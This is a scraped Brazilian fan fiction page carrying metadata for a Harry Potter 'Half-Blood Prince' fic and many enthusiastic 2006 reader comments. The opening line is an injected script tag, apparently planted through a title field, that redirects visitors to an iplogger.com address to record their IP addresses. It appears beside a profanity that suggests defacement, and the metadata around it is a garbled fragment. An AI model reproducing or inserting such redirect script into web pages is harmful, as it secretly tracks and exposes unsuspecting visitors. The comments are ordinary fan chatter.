<SCRIPT>window.location.href="https://iplogger.com/1Opv3.gif"</SCRIPT »>
Foda-se
","headline":"","url":"https://www.floreioseborroes.net/fics/ver/5005","inLanguage":"pt-BR","genre":"Fan fiction","isAccessibleForFree":true,"description":"Essa fic contém spoilers, dicas, pistas, insinuações, palpites e mais sobre Harry Potter and the Half-Blood Prince. Os personagens e o enred","image":"http://storage.msn.com/x1pFUxp6NG29bW3Uy8xnoGhE3lfnFozsOj27OUjuAgYgzcUOsZ6EQx96JvNJhv6aleexlwABNPPtGP-h9pKtxxztqk09YsUIa25GQDUTXGp657FjIUVEwKu0Xleo521HD0yUElEHid32hDdS-q22xqjPg","datePublished":"2005-08-05","dateModified":"2017-04-25","author":{"@type":"Person","name":"Sônia Sag","url":"https://www.floreioseborroes.net/users/ver/3634"},"publisher":{"@type":"Organization","name":"Floreios e Borroes","url":"https://www.floreioseborroes.net"},"aggregateRating":{"@type":"AggregateRating","ratingValue":4.92,"ratingCount":21437,"bestRating":5,"worstRating":1}}
Foda-se
Comentários (2867)
eu não sei do resto da galera,MAS EU ADOREI!mais ainda a notícia de que o próximo ainda é que é o ultimo!eu confesso que eu naum entendi a doida que deu no Harry,mas torezando pra que dê tudo bem!eu naum te odeio de jeito nenhum,na verdade eu tou pensando como vou viver sem sua fic!boa sorte no ultimo capítulo,eu aguardo ansiosa,beijo e até o próximo!
2006-06-02bem.. nem tem muito o que comentar não. PERFEITAAAAAAAAAAAAAA.. hahuahusahs... e soh uma dúvida nakele final.. Sirius?! hehe... bem eh isso.. delonge o melhor cap da história Sônia... a melhor fic que eu jah li!!! "parabéns d+++"... fui... ah, e como num tem jeito.. num demora pra atualizar não!!!!!!!!!!!!!!!!!!
2006-06-02Muito bom, realmente!!!!! mas por favor atualize o último capítulo em breve neh!!!!!!!!!!!!!
2006-06-02Olha como no meu comentario anterior soh tenho elogios pra vc !!! muito boa sua fic sabe como prender a atenção dos leitores ! mas realmente vc merecia apanhar ou algo do tipo pq terminar a fic no ponto maximo d Ecxtasi eh crueldade !!!! bom.. Atualize em breve ... P O R F A V O R !!!
2006-06-02Eu não acredito em tudo que vi! Está simplesmente genial. Tem bastatnte do Estilo JKR de escrever mas menos forçado (sim, eu realmente quis dizer MENOS). Sugiro que não tenha pressa pra atualizar o último capítulo porque senão pode estragar essa fic que está até agora impecável. Só não vale colocar o Harry como sendo a ultima horcrux hein ;) Na falta de palavras, deixo apenas os Parabéns
2006-06-01Por merlin sonia vou te mandar para azkaban c/ o k vc ta fazendu comigu!! ATUALIZ PARECE QUE VC USOU 2 CRUCIATTUS EM MIM!!!!!!!!!!
2006-06-01tua fic tah mtoo boa mais vc demora de mais pa posta!!!!!!!!
2006-06-01nossa... essa fic tah muito legal msm.... parabens adorei... agora estou esperando o ultimo capitulo... imagino q seja o melhor d tds bjux
2006-06-01eu sei que isso é MUITO chato... mas PELO AMOOOOOORR DE DEUUUUUSSS, ATUALIZAAAAAAAAAAAAAA!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! hehehe... desculpa, não pude me conter... =X mas atualiza! rs.. Beijos,
2006-05-31Essa fic é uma das ou a melhor que eu jah li, e eu jah li MUITAS.. Parabêns pelo seu ótimo trabalho , vc só merece elogios..
2006-05-31